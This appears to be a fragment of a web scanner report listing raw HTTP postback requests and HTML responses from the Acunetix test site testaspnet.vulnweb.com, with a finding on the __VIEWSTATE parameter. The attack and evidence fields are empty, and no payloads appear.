Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8532&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBAV9R7UtsIZGRk7fNW8T2OKEhAbRK4c%2FSyAHRVAPw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKLgIqGCgLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA1M8sM%2FVFr%2F4OEZgdzndPEqOsl05
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:25:21 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBAV9R7UtsIZGRk7fNW8T2OKEhAbRK4c/SyAHRVAPw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKLgIqGCgLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA1M8sM/VFr/4OEZgdzndPEqOsl05" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:White" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8520&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBAYtcNSdsIZGRkS12gpCfvuhIKUv13hpmxEr3shsY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLG2p%2FvDALQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA%2BoWSfVKRMCrI9OyXTDucAyyl8ya
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:30 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBAYtcNSdsIZGRkS12gpCfvuhIKUv13hpmxEr3shsY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLG2p/vDALQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA+oWSfVKRMCrI9OyXTDucAyyl8ya" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:White" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
